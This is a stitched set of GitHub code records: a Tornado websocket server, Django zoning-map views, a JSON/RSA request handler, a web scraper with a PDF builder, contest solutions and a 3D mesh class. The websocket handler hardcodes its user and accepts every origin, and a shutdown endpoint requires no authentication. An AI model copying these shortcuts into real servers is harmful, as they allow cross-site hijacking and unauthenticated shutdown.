get_current_user(self):\n return User(id=1, username=\"guanghongwei\", name=\"广宏伟\")\n\n def check_origin(self, origin):\n return True\n\n\nclass InteractiveWehSocketHandler(BaseWehSocketHandler, tornado.websocket.WebSocketHandler):\n @tornado.web.authenticated\n def open(self):\n request = Request(self.request.remote_ip)\n self.request.__dict__.update(request.__dict__)\n InteractiveServer(self.app, self.request, self.client).activate_async()\n\n def on_message(self, message):\n try:\n message = json.loads(message)\n except json.JSONDecodeError:\n logger.info(\"Loads websocket json message failed\")\n return\n\n if message.get('event'):\n self.evt_handle(message)\n elif message.get('data'):\n self.proxy.send(message)\n\n def on_close(self):\n self.proxy.close()\n\n def evt_handle(self, data):\n if data['event'] == 'change_size':\n try:\n self.request.meta['width'] = data['meta']['width']\n self.request.meta['height'] = data['meta']['height']\n self.request.change_size_event.set()\n except KeyError:\n pass\n\n\nclass ProxyWehSocketHandler(BaseWehSocketHandler):\n pass\n\n\nclass MonitorWehSocketHandler(BaseWehSocketHandler):\n pass\n\n\nclass WSServer:\n routers = [\n (r'/ws/interactive/', InteractiveWehSocketHandler),\n (r'/ws/proxy/(?P[0-9]+)/(?P[0-9]+)/', ProxyWehSocketHandler),\n (r'/ws/session/(?P[0-9]+)/monitor/', MonitorWehSocketHandler),\n ]\n\n # prepare may be rewrite it\n settings = {\n 'cookie_secret': '',\n 'app': None,\n 'login_url': '/login'\n }\n\n def __init__(self, app):\n self.app = app\n self._prepare()\n\n def _prepare(self):\n self.settings['cookie_secret'] = self.app.config['SECRET_KEY']\n self.settings['app'] = self.app\n\n def run(self):\n host = self.app.config[\"BIND_HOST\"]\n port = self.app.config[\"WS_PORT\"]\n print('Starting websocket server at %(host)s:%(port)s' %\n {\"host\": host, \"port\": port})\n ws = tornado.web.Application(self.routers, **self.settings)\n ws.listen(port=port, address=host)\n tornado.ioloop.IOLoop.current().start()\n","repo_name":"ibuler/coco","sub_path":"coco/ws.py","file_name":"ws.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"17275725031","text":"from django.shortcuts import render\nimport requests\nfrom django.core.serializers import serialize\nfrom develop.models import TrackArea\nfrom arcgis2geojson import arcgis2geojson\nfrom django.views.decorators.clickjacking import xframe_options_exempt\n\n\ndef get_ncod_data():\n url = \"https://maps.raleighnc.gov/arcgis/rest/services/Planning/Overlays/MapServer/9/query?where=1%3D1&outFields\" \\\n \"=*&outSR=4326&f=json\"\n\n return requests.request(\"GET\", url, headers={}, data={})\n\n\n@xframe_options_exempt\ndef itb(request):\n itb_data = serialize(\"geojson\", TrackArea.objects.all(), geometry_field=\"geom\", fields=(\"long_name\",))\n\n return render(request, \"itb.html\", {\"itb_data\": itb_data})\n\n\n@xframe_options_exempt\ndef ncod(request):\n ncod_response = get_ncod_data()\n ncod_data = arcgis2geojson(ncod_response.json())\n\n return render(request, \"ncod.html\", {\"ncod_data\": ncod_data})\n\n\n@xframe_options_exempt\ndef dx_zoning(request):\n url = \"https://maps.raleighnc.gov/arcgis/rest/services/Planning/Zoning/MapServer/0/query?outFields=*&outSR=4326&f\" \\\n \"=json&where=ZONE_TYPE='DX-'\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n\n dx_zoning_data = arcgis2geojson(response.json())\n\n return render(request, \"dx.html\", {\"dx_zoning_data\": dx_zoning_data})\n\n\n@xframe_options_exempt\ndef dx_zoning40(request):\n # Keep this on one line unless you want to investigate why it doesn't work when on two.\n url = \"https://maps.raleighnc.gov/arcgis/rest/services/Planning/Zoning/MapServer/0/query?outFields=*&outSR=4326&f\" \\\n \"=json&where=HEIGHT>30 AND ZONE_TYPE='DX-'\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n\n dx40_zoning_data = arcgis2geojson(response.json())\n\n return render(request, \"dx.html\", {\"dx_zoning_data\": dx40_zoning_data})\n","repo_name":"dtraleigh/dtraleigh","sub_path":"develop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14538101215","text":"\"\"\"\nThis module processes client requests, fetches databases, and writes responses.\n\"\"\"\n\n__version__ = \"0.1\"\n__author__ = \"Aleksei Mashlakov\"\n\nimport os\nimport sys\n\nfrom tornado.escape import json_decode, json_encode\nfrom tornado.ioloop import IOLoop\nfrom tornado.locks import Semaphore\nfrom tornado.web import RequestHandler\n\nfrom interface.encryption import RSAEncryption\n\n# sem = Semaphore(1)\n\ntry:\n import logging\n\n from __main__ import logger_name\n\n log = logging.getLogger(logger_name)\nexcept Exception as e:\n log = logging.getLogger(\"PLATFORM\")\n\n\nclass BasicHandler(RequestHandler):\n def initialize(self, database):\n self.db = database\n\n async def prepare(self):\n if self.request.headers.get(\"Content-Type\", \"\").startswith(\"application/json\"):\n self.json_args = json_decode(self.request.body)\n else:\n self.json_args = None\n self.send_error(status_code=400, reason=\"Content-Type must be JSON\")\n\n async def post(self):\n try:\n # async with sem:\n # response = await self.db.handle_request(self.json_args)\n response = await self.db.handle_request(self.json_args)\n self.write(json_encode(response))\n except ValueError:\n self.send_error(400, reason=\"Unable to parse JSON.\") # Bad Request\n\n\nclass EncryptedHandler(RequestHandler):\n def initialize(self, database):\n self.db = database\n\n async def prepare(self):\n if self.request.headers.get(\"Content-Type\", \"\").startswith(\"application/json\"):\n self.json_args = json_decode(RSAEncryption().decrypt(self.request.body))\n else:\n self.json_args = None\n self.send_error(status_code=400, reason=\"Content-Type must be JSON\")\n\n async def post(self):\n try:\n # async with sem:\n # response = await self.db.handle_request(self.json_args)\n response = await self.db.handle_request(self.json_args)\n encrypted_response = RSAEncryption().encrypt(json_encode(response))\n self.write(encrypted_response)\n except ValueError:\n self.send_error(400, reason=\"Unable to parse JSON.\") # Bad Request\n\n\nclass ShutdownHandler(RequestHandler):\n async def post(self):\n try:\n self.write(json_encode({\"success\": True}))\n IOLoop.current().stop()\n except ValueError:\n self.send_error(400, reason=\"Bad Request.\")\n","repo_name":"aleksei-mashlakov/flexibility-metadata-registry","sub_path":"platform/interface/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6607496948","text":"from reportlab.lib.pagesizes import A4\nfrom reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer, Image, Flowable,Table\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.lib.units import inch\nfrom scraper import scrape\nfrom io import BytesIO\nimport PIL\nimport sys\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\nbase_url = \"http://random-art.org/\"\nproxies = {\n\n}\n\ndef scrape(s,e,popularity=False):\n payload = {\n 'page':'',\n 'sort':'time'\n }\n if popularity:\n payload['sort']='popularity'\n img_list = []\n count = 1\n for n,i in enumerate(range(s,e+1)):\n print(\"[x] Page \" + str(n+1))\n payload['page']=str(i)\n r = requests.get(base_url,payload,proxies=proxies).content\n soup = bs(r,'html.parser')\n tags = soup.findAll(attrs={'class':'image'})\n for tag in tags:\n _img = tag.find('img')\n img={}\n img['count']= count\n img['src']=_img.get('src').replace('small','large')\n img['alt']=_img.get('alt')\n img_list.append(img)\n count+=1\n return img_list\n\nimg_list = scrape(1,20,True)\nlist_size = len(img_list)\nprint(\"[x]Total Images Scraped : \",list_size)\n#Downloading the images into a folder\nprint('[x]Downloading Images')\nfor img in img_list:\n sys.stdout.write('\\r')\n percent = img['count']*100/list_size\n url = base_url+img['src']\n r = requests.get(url,proxies=proxies)\n image = PIL.Image.open(BytesIO(r.content))\n image.save('images\\\\'+str(img['count'])+\".jpg\",format='JPEG')\n sys.stdout.write(\"%d%%\"%percent)\n sys.stdout.flush()\n\n\npdfmetrics.registerFont(TTFont('consolas', 'unifont-9.0.01.ttf'))\ndoc = SimpleDocTemplate(\"test.pdf\",pagesize=A4,\n rightMargin=40,leftMargin=40,\n topMargin=40,bottomMargin=18)\nstyles = getSampleStyleSheet()\nstyleH = styles['Heading1']\nstyleN = styles['Normal']\n\n\nprint('[x]Building pdf')\nStory=[]\nStory.append(Paragraph(\"random-art\",styleH))\nStory.append(Spacer(1,10)) \nStory.append(Paragraph('''\n The pictures in this gallery are made by a computer program.\n The program accepts the name of a picture and uses it as a seed\n from which a picture is generated randomly.\n The same name always yields the same picture.\n '''\n ,styleN))\nStory.append(Spacer(1,10)) \nStory.append(Paragraph('''\n The author of the random art program is \n Andrej Bauer.\n '''\n ,styleN))\nStory.append(Spacer(1,20))\nStory.append(Paragraph(\"catalogue\",styleH))\nStory.append(Spacer(1,10)) \nprint(\"Building Table\")\nfor i in range(0,list_size,3):\n tbl_data=[\n [Image(\"images\\\\\"+str(img_list[i]['count'])+\".jpg\",1.5*inch,1.5*inch),\n Image(\"images\\\\\"+str(img_list[i+1]['count'])+\".jpg\",1.5*inch,1.5*inch),\n Image(\"images\\\\\"+str(img_list[i+2]['count'])+\".jpg\",1.5*inch,1.5*inch)\n ],\n [\n Paragraph('''%s''' % img_list[i]['alt'],styleN),\n Paragraph('''%s''' % img_list[i+1]['alt'],styleN),\n Paragraph('''%s''' % img_list[i+2]['alt'],styleN)\n ]\n ]\n Story.append(Table(tbl_data,colWidths=[2.2*inch,2.2*inch,2.2*inch]))\n Story.append(Spacer(1,12))\n\n\ndoc.build(Story)\n\n\n","repo_name":"TheChesireCat/art","sub_path":"gen_pdf.py","file_name":"gen_pdf.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23148565312","text":"def main():\n A, B, K = map(int, input().split())\n count = 0\n number = min(A, B)\n while True:\n if A % number == 0 and B % number == 0:\n count += 1\n if count == K:\n break\n number -= 1\n print(number)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Tomoki-Kikuta/atcoder","sub_path":"abc120/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23378033071","text":"import sys\r\n\r\n\r\ndef determine_gamestate(board):\r\n winX = test_won(board, \"X\")\r\n winO = test_won(board, \"O\")\r\n if winX and not winO:\r\n return \"X won\"\r\n elif winO and not winX:\r\n return \"O won\"\r\n elif test_finished(board):\r\n return \"Draw\"\r\n else:\r\n return \"Game has not completed\"\r\n\r\n\r\ndef test_finished(board):\r\n return not any((item == '.') for row in board for item in row)\r\n\r\n\r\ndef test_won(board, sign):\r\n return any(test_combination(comb, sign) for comb in get_possible_combinations(board))\r\n\r\n\r\ndef test_combination(combination, sign):\r\n return all(x in [sign, \"T\"] for x in combination)\r\n\r\n\r\ndef get_possible_combinations(board):\r\n return [\r\n [board[0][0], board[1][0], board[2][0], board[3][0]],\r\n [board[0][1], board[1][1], board[2][1], board[3][1]],\r\n [board[0][2], board[1][2], board[2][2], board[3][2]],\r\n [board[0][3], board[1][3], board[2][3], board[3][3]],\r\n\r\n [board[0][0], board[0][1], board[0][2], board[0][3]],\r\n [board[1][0], board[1][1], board[1][2], board[1][3]],\r\n [board[2][0], board[2][1], board[2][2], board[2][3]],\r\n [board[3][0], board[3][1], board[3][2], board[3][3]],\r\n\r\n [board[0][0], board[1][1], board[2][2], board[3][3]],\r\n [board[0][3], board[1][2], board[2][1], board[3][0]]\r\n ]\r\n\r\n\r\ndef get_boards(path):\r\n with open(path) as f:\r\n lines = f.readlines()\r\n\r\n num_boards = int(lines[0])\r\n return num_boards, ([lines[5*i+j] for j in range(1, 5)] for i in range(num_boards))\r\n\r\nif __name__ == '__main__':\r\n print(sys.argv[1])\r\n num_boards, boards = get_boards(sys.argv[1])\r\n for i in range(num_boards):\r\n print(\"Case #{gamenum}: {gamestate}\".format(gamenum=i+1, gamestate=determine_gamestate(boards.__next__())))\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_116/1030.py","file_name":"1030.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44447092172","text":"\"\"\"\nRead json file containing six dictionaries about sound and phonotactic\ncorrespondences and turn it into a human-readable tsv-file with additional\ninfo for easier manual inspection.\n\"\"\"\n\nimport csv\nimport re\n\nfrom loanpy.utils import scjson2tsv\n\ndef run(args):\n \"\"\"\n #. Read forms.csv\n #. Convert it so that it corresponds to the sample input file in\n lingpy's documentation at\n https://github.com/lingpy/lingpy/blob/master/tests/test_data/KSL.qlc\n #. Write that file to the folder ``lingpy``.\n \"\"\"\n\n with open(\"cldf/forms.csv\") as f:\n forms = list(csv.reader(f))\n\n with open(\"lingpy/wot.tsv\", \"w+\") as f:\n writer = csv.writer(f, delimiter=\"\\t\")\n writer.writerow(['# KSL']),\n writer.writerow([\n 'ID', 'DOCULECT', 'CONCEPT', 'GlossID',\n 'Orthography', 'IPA', 'Tokens', 'CogID'\n ])\n\n for i, row in enumerate(forms[1:]):\n if i == 0 or row[9] != forms[i][9]: # cognacy\n writer.writerow([\"#\"])\n\n newrow = [i, row[2], row[3], row[9],\n row[5], re.sub(\"[. ]\", \"\", row[6]), row[6], row[9]]\n\n writer.writerow(newrow)\n","repo_name":"LoanpyDataHub/ronataswestoldturkic","sub_path":"ronataswestoldturkiccommands/makelingpyinput.py","file_name":"makelingpyinput.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1168551042","text":"'''\r\nAuthor: Night-stars-1 nujj1042633805@gmail.com\r\nDate: 2023-05-23 17:39:27\r\nLastEditors: Night-stars-1 nujj1042633805@gmail.com\r\nLastEditTime: 2023-07-14 22:44:33\r\nDescription: \r\n\r\nCopyright (c) 2023 by Night-stars-1, All Rights Reserved. \r\n'''\r\nfrom ctypes import windll\r\nimport pygetwindow as gw\r\nfrom PIL import ImageGrab\r\n\r\nfrom utils.config import sra_config_obj, normalize_file_path, CONFIG_FILE_NAME\r\nfrom utils.log import log\r\n\r\n\r\ndef get_width(title):\r\n window = gw.getWindowsWithTitle(title)[0]\r\n hwnd = window._hWnd\r\n\r\n # 获取活动窗口的大小\r\n window_rect = window.width, window.height\r\n\r\n user32 = windll.user32\r\n desktop_width = user32.GetSystemMetrics(0)\r\n desktop_height = user32.GetSystemMetrics(1)\r\n \r\n #单显示器屏幕宽度和高度:\r\n img = ImageGrab.grab()\r\n width, height=img.size\r\n\r\n scaling = round(width/desktop_width*100)/100\r\n \"\"\" \r\n # 获取当前显示器的缩放比例\r\n dc = win32gui.GetWindowDC(hwnd)\r\n dpi_x = win32print.GetDeviceCaps(dc, win32con.LOGPIXELSX)\r\n dpi_y = win32print.GetDeviceCaps(dc, win32con.LOGPIXELSY)\r\n win32gui.ReleaseDC(hwnd, dc)\r\n scale_x = dpi_x / 96\r\n scale_y = dpi_y / 96\r\n log.info(f\"Real : {width} x {height} {dc} x {dc}\")\r\n \"\"\"\r\n\r\n # 计算出真实分辨率\r\n real_width = int(window_rect[0])\r\n real_height = int(window_rect[1])\r\n borderless = True if real_width*scaling == 1920 else False\r\n left_border = (real_width*scaling-1920)/2\r\n up_border = (real_height*scaling-1080)-left_border\r\n real_width1 = 1920\r\n real_height1 = 1080\r\n\r\n log.info(f\"Real resolution: {real_width} x {real_height} x {scaling} x {borderless}\")\r\n\r\n sra_config_obj.real_width = real_width1\r\n sra_config_obj.real_height = real_height1\r\n sra_config_obj.scaling = scaling\r\n sra_config_obj.borderless = borderless\r\n sra_config_obj.left_border = left_border\r\n sra_config_obj.up_border = up_border\r\n\r\n # 排除缩放干扰\r\n windll.user32.SetProcessDPIAware()\r\n ","repo_name":"Starry-Wind/StarRailAssistant","sub_path":"get_width.py","file_name":"get_width.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":2252,"dataset":"github-code","pt":"61"} +{"seq_id":"28703923722","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport numpy as np\nfrom math import sqrt, cos, sin\nfrom Meshes.matrix import *\nfrom Meshes.tools import boundingBox\n\ntry:\n basestring\nexcept NameError:\n basestring = str\n\nclass Mesh(object):\n def __init__(self, name = ''):\n self.name = name\n self.vertices = []\n self.vertices_colors = []\n self.vertices_normals = []\n self.vertices_texcoords = []\n self.indices = []\n self.indices_normals = []\n self.indices_texcoords= []\n self.edge_indices = []\n self.edge_color = []\n self.materials = []\n\n def add( self, mesh ):\n offset = len(self.vertices)\n\n self.vertices.extend(mesh.vertices)\n self.vertices_colors.extend(mesh.vertices_colors)\n self.vertices_normals.extend(mesh.vertices_normals)\n self.vertices_texcoords.extend(mesh.vertices_texcoords)\n\n for i in range(len(mesh.indices)):\n self.indices.append( offset + mesh.indices[i] );\n\n for i in range(len(mesh.materials)):\n index = offset + mesh.materials[i][0]\n mat = mesh.materials[i][1]\n self.addMaterial( mat, index )\n\n # VERTICES\n\n def addVertex( self, v ):\n if isinstance(v, np.ndarray):\n self.vertices.append( v.copy() )\n else:\n self.vertices.append( np.array(v) )\n\n def totalVertices( self ):\n return len(self.vertices)\n\n def vertexString( self, index ):\n return '%f %f %f' % (self.vertices[index][0], self.vertices[index][1], self.vertices[index][2])\n\n # TEXCOORDS\n\n def addTexCoord( self, vt ):\n if isinstance(vt, np.ndarray):\n self.vertices_texcoords.append( vt.copy() )\n else:\n self.vertices_texcoords.append( np.array(vt) )\n\n def addTexCoordIndex( self, index ):\n self.indices_texcoords.append( index );\n\n def addTexCoordTriangle( self, i1, i2, i3 ):\n self.addTexCoordIndex( i1 )\n self.addTexCoordIndex( i2 )\n self.addTexCoordIndex( i3 )\n\n def texCoordString( self, index ):\n return ' %f %f' % (self.vertices_texcoords[index][0], self.vertices_texcoords[index][1])\n\n # NORMALS\n\n def addNormal( self, vn ):\n if isinstance(vn, np.ndarray):\n self.vertices_normals.append( vn.copy() )\n else:\n self.vertices_normals.append( np.array(vn) )\n\n def addNormalIndex( self, index ):\n self.indices_normals.append( index )\n\n def addNormalTriangle( self, i1, i2, i3 ):\n self.addNormalIndex( i1 )\n self.addNormalIndex( i2 )\n self.addNormalIndex( i3 )\n\n def normalString( self, index):\n n = self.vertices_normals[index]\n return ' %f %f %f' % (n[0], n[1], n[2])\n\n # COLORS\n\n def addColor( self, vc ):\n if isinstance(vc, basestring) or isinstance(vc, str):\n vc = vc.lstrip('#')\n lv = len(vc)\n color = tuple(int(vc[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))\n self.vertices_colors.append( [color[0], color[1], color[2]] )\n elif isinstance(vc, np.ndarray):\n self.vertices_colors.append( vc.copy() )\n else:\n self.vertices_colors.append( np.array(vc) )\n\n def colorString( self, index, alpha = True ):\n if len(self.vertices_colors[index]) == 3:\n return ' %i %i %i' % (self.vertices_colors[index][0], self.vertices_colors[index][1], self.vertices_colors[index][2])\n elif len(self.vertices_colors[index]) == 4:\n if alpha:\n return ' %f %f %f %f' % (self.vertices_colors[index][0], self.vertices_colors[index][1], self.vertices_colors[index][2], self.vertices_colors[index][3])\n else:\n return ' %f %f %f' % (self.vertices_colors[index][0], self.vertices_colors[index][1], self.vertices_colors[index][2])\n\n # EDGES\n\n def addEdge( self, i1, i2, color = None ):\n self.edge_indices.append( i1 );\n self.edge_indices.append( i2 );\n if color:\n self.edge_color.append( color )\n\n def totalEdges( self ):\n return int(len(self.edge_indices)/2)\n\n def edgeString( self, number ):\n v1 = self.edge_indices[number*2]\n v2 = self.edge_indices[number*2+1]\n\n string = '%i %i' % (v1, v2)\n\n if len(self.edge_color) > 0:\n if len(self.edge_color[number]) == 3:\n string += ' %i %i %i' % (self.edge_color[number][0], self.edge_color[number][1], self.edge_color[number][2])\n elif len(self.edge_color[number]) == 4:\n string += ' %f %f %f %f' % (self.edge_color[number][0], self.edge_color[number][1], self.edge_color[number][2], self.edge_color[number][3])\n \n return string\n\n # TRIANGLES / FACES\n\n def addIndex( self, index ):\n self.indices.append( index )\n\n def totalIndices( self ):\n return len(self.indices)\n\n def addTriangle( self, i1, i2, i3 ):\n self.addIndex( i1 )\n self.addIndex( i2 )\n self.addIndex( i3 )\n\n def triangleString( self, index ):\n v1 = self.indices[index*3+0]\n v2 = self.indices[index*3+1]\n v3 = self.indices[index*3+2]\n return ' %i %i %i' % (v1, v2, v3)\n\n def totalFaces( self ):\n return int(len(self.indices)/3)\n\n def faceString( self, number ):\n v1 = vt1 = vn1 = self.indices[number*3] + 1\n v2 = vt2 = vn2 = self.indices[number*3+1] + 1\n v3 = vt3 = vn3 = self.indices[number*3+2] + 1\n\n if len(self.indices_texcoords) > 0:\n vt1 = self.indices_texcoords[number*3] + 1\n vt2 = self.indices_texcoords[number*3+1] + 1\n vt3 = self.indices_texcoords[number*3+2] + 1\n\n if len(self.indices_normals) > 0:\n vn1 = self.indices_normals[number*3] + 1\n vn2 = self.indices_normals[number*3+1] + 1\n vn3 = self.indices_normals[number*3+2] + 1\n\n if len(self.vertices_texcoords) > 0:\n if len(self.vertices_normals) > 0:\n return ' %i/%i/%i %i/%i/%i %i/%i/%i' % (v1, vt1, vn1, v2, vt2, vn2, v3, vt3, vn3)\n else:\n return ' %i/%i %i/%i %i/%i' % (v1, vt1, v2, vt2, v3, vt3)\n elif len(self.vertices_normals) > 0:\n return ' %i//%i %i//%i %i//%i' % (v1, vn1, v2, vn2, v3, vn3)\n else:\n return ' %i %i %i' % (v1, v2, v3)\n\n # MATERIAL\n\n def addMaterial( self, mat, index = None ):\n if index == None:\n index = len(self.vertices)\n self.materials.append( [index, mat] )\n\n # OPERATIONS\n\n def clear( self ):\n self.vertices = []\n self.vertices_colors = []\n self.vertices_normals = []\n self.vertices_texcoords = []\n\n self.indices = []\n self.indices_normals = []\n self.indices_texcoords= []\n\n self.edge_indices = []\n self.edge_color = []\n\n self.offset = 0\n\n def invertNormals( self ):\n # tig: flip face(=triangle) winding order, so that we are consistent with all other ofPrimitives.\n # i wish there was a more elegant way to do this, but anything happening before 'split vertices'\n # makes things very, very complicated.\n for i in range(0, len(self.indices))[::3]:\n tmp = self.indices[i+1]\n self.indices[i+1] = self.indices[i+2]\n self.indices[i+2] = tmp\n\n for i in range(0, len(self.vertices_normals)):\n self.vertices_normals[i] = np.array(self.vertices_normals[i]) * -1.\n\n def flatNormals( self ):\n # get copy original mesh data\n numIndices = len(self.indices)\n indices = self.indices\n verts = self.vertices\n texCoords = self.vertices_texcoords\n colors = self.vertices_colors\n \n # remove all data to start from scratch\n self.clear();\n \n # add mesh data back, duplicating vertices and recalculating normals\n normal = []\n for i in range(0, numIndices):\n indexCurr = indices[i];\n \n if i % 3 == 0:\n indexNext1 = indices[i + 1]\n indexNext2 = indices[i + 2]\n\n e1 = verts[indexCurr] - verts[indexNext1]\n e2 = verts[indexNext2] - verts[indexNext1]\n t = np.cross(e1, e2) * -1.\n dist = sqrt(t[0] * t[0] + t[1] * t[1] + t[2] * t[2])\n normal = t / dist\n \n self.addIndex(i);\n self.addNormal(normal);\n \n if indexCurr < len(texCoords):\n self.addTexCoord(texCoords[indexCurr])\n \n if indexCurr < len(verts):\n self.addVertex(verts[indexCurr])\n \n if indexCurr < len(colors):\n self.addColor(colors[indexCurr])\n\n\n def scale( self, scale ):\n mat = mat4_scale(scale)\n self.transform(mat)\n\n\n def translateX( self, d ):\n mat = mat4_translateX(d)\n self.transform(mat)\n\n\n def translateY( self, d ):\n mat = mat4_translateY(d)\n self.transform(mat)\n\n\n def translateZ( self, d ):\n mat = mat4_translateZ(d)\n self.transform(mat)\n \n\n def translate( self, dir ):\n mat = np.identity(4)\n\n if isinstance( dir, (np.ndarray, np.generic) ):\n if dir.shape[0] == 3:\n mat = mat4_translate( dir ) \n elif len(dir.shape) == 2 and dir.shape[1] == 4:\n mat = dir\n elif isinstance( dir, (list, tuple) ):\n mat = mat4_translate( dir ) \n\n self.transform( mat )\n\n\n def rotateX( self, deg ):\n mat = mat4_rotateX(deg)\n self.rotate_mat4(mat)\n\n\n def rotateY( self, deg ):\n mat = mat4_rotateY(deg)\n self.rotate_mat4(mat)\n\n\n def rotateZ( self, deg ):\n mat = mat4_rotateZ(deg)\n self.rotate_mat4(mat)\n\n\n def rotate_quat(self, quaternion):\n mat = mat4_from_quat( quaternion)\n self.rotate_mat4(mat)\n\n\n def rotate_axis( self, angle, direction, point=None):\n mat = mat4_rotate(angle, direction, point)\n self.rotate_mat4(mat)\n\n\n def rotate_axis_euler( self, ai, aj, ak, axes='sxyz'):\n mat = mat4_from_euler(ai, aj, ak, axes)\n self.rotate_mat4(mat)\n\n\n def rotate_normal( self, normal, up=[0.0, 0.0, 1.0]):\n self.rotate_from_A_to_B(vec3(up), vec3(normal))\n\n\n def rotate_from_A_to_B( self, A_vec, B_vec):\n mat = mat4_from_A_to_B(A_vec, B_vec)\n self.rotate_mat4(mat)\n\n\n def rotate_mat4( self, mat4 ):\n self.transform( mat4 )\n self.transform_normals( mat4 )\n\n \n def transform( self, mat ):\n for i in range(len(self.vertices)):\n self.vertices[i] = mat4_mult(mat, self.vertices[i])\n\n\n def transform_normals( self, mat ):\n for i in range(len(self.vertices_normals)):\n self.vertices_normals[i] = mat4_mult(mat, self.vertices_normals[i])\n\n\n def center( self ):\n bbox = boundingBox(self.vertices)\n dx = bbox[3] - bbox[0]\n dy = bbox[4] - bbox[1]\n dz = bbox[5] - bbox[2]\n self.translateX(-bbox[3] + dx * 0.5 )\n self.translateY(-bbox[4] + dy * 0.5 )\n self.translateZ(-bbox[5] + dy * 0.5 )\n\n # EXPORT/IMPORT\n\n def toObj( self, file_name = None ):\n lines = '# OBJ by Patricio Gonzalez Vivo\\n'\n\n # Materials Library\n if file_name != None and len(self.materials) > 0:\n mat_lines = ''\n mat_names = []\n for mat in self.materials:\n name = mat[1].name\n if not name in mat_names:\n mat_names.append(name)\n mat_lines += mat[1].toMtl()\n\n mat_filename = os.path.splitext(file_name)[0] + '.mtl'\n file = open( mat_filename, 'w' )\n file.write( mat_lines )\n file.close()\n lines += 'mtllib ' + os.path.basename(mat_filename) + '\\n'\n\n # Name\n if len(self.name) > 0:\n lines += 'o ' + self.name + '\\n'\n\n # Vertices (and optional color)\n color = len(self.vertices_colors) > 0\n for index in range( len(self.vertices) ):\n lines += 'v ' + self.vertexString( index ) \n if color:\n lines += self.colorString( index, False )\n lines += '\\n'\n\n # Texture Coords\n for index in range( len(self.vertices_texcoords) ):\n lines += 'vt' + self.texCoordString( index ) + '\\n'\n\n # Normals \n for index in range( len(self.vertices_normals) ):\n lines += 'vn' + self.normalString( index ) + '\\n'\n\n # Faces\n material_counter = 0\n for index in range( self.totalFaces() ):\n if material_counter < len(self.materials):\n if self.materials[material_counter][0] <= self.indices[index*3] or self.materials[material_counter][0] <= self.indices[index*3+1] or self.materials[material_counter][0] <= self.indices[index*3+2]:\n lines += 'usemtl ' + self.materials[material_counter][1].name + '\\n'\n material_counter += 1\n lines += 's 1\\n'\n lines += 'f' + self.faceString( index ) + '\\n'\n\n if file_name:\n file = open(file_name, 'w')\n file.write( lines )\n file.close()\n else:\n return lines\n\n def fromObj( self, file_name ):\n for line in open(file_name, 'r'):\n # Skip comments\n if line.startswith('#'):\n continue\n\n # Skip empty lines\n if line == \"\":\n continue\n \n values = line.split()\n\n # Skip if there is not enough information\n if len(values) < 2:\n continue\n\n type = values[0]\n args = values[1:]\n\n if type == 'v':\n if len(args) == 3:\n v = map(float, args)\n self.addVertex(np.array(v))\n elif type == 'vt':\n if len(args) == 2:\n vt = map(float, args)\n self.addTexCoord(np.array(vt))\n elif type == 'vn':\n if len(args) == 3:\n vn = map(float, args)\n self.addNormal(np.array(vn))\n elif type == 'f':\n if len(args) == 3:\n A = map(int, args[0].split('/'))\n B = map(int, args[1].split('/'))\n C = map(int, args[2].split('/'))\n\n self.addTriangle(A[0]-1, B[0]-1, C[0]-1)\n\n # if (A[0] != A[1] != A[2]) or (B[0] != B[1] != B[2]) or (C[0] != C[1] != C[2]):\n self.addTexCoordTriangle(A[1]-1, B[1]-1, C[1]-1)\n self.addNormalTriangle(A[2]-1, B[2]-1, C[2]-1)\n elif len(args) > 3:\n values = []\n\n for i in range(len(args)):\n values.append( map(int, args[i].split('/')) )\n\n # Add first triangle\n self.addTriangle(values[0][0]-1, values[1][0]-1, values[2][0]-1)\n # if (values[0][0] != values[0][1] != values[0][2]) or (values[1][0] != values[1][1] != values[1][2]) or (values[2][0] != values[2][1] != values[2][2]):\n self.addTexCoordTriangle(values[0][1]-1, values[1][1]-1, values[2][1]-1)\n self.addNormalTriangle(values[0][2]-1, values[1][2]-1, values[2][2]-1)\n\n for i in range(3, len(values)):\n self.addTriangle(values[i-3][0]-1, values[i-1][0]-1, values[i][0]-1)\n # if (values[i-3][0] != values[i-3][1] != values[i-3][2]) or (values[i-1][0] != values[i-1][1] != values[i-1][2]) or (values[i][0] != values[i][1] != values[i][2]):\n self.addTexCoordTriangle(values[i-3][1]-1, values[i-1][1]-1, values[i][1]-1)\n self.addNormalTriangle(values[i-3][2]-1, values[i-1][2]-1, values[i][2]-1)\n\n def toPly( self, file_name = None ):\n lines = '''ply\nformat ascii 1.0\nelement vertex '''+str(len(self.vertices))+'''\nproperty float x\nproperty float y\nproperty float z\n'''\n if len(self.vertices_normals) > 0:\n lines += 'property float nx\\n'\n lines += 'property float ny\\n'\n lines += 'property float nx\\n'\n\n if len(self.vertices_colors) 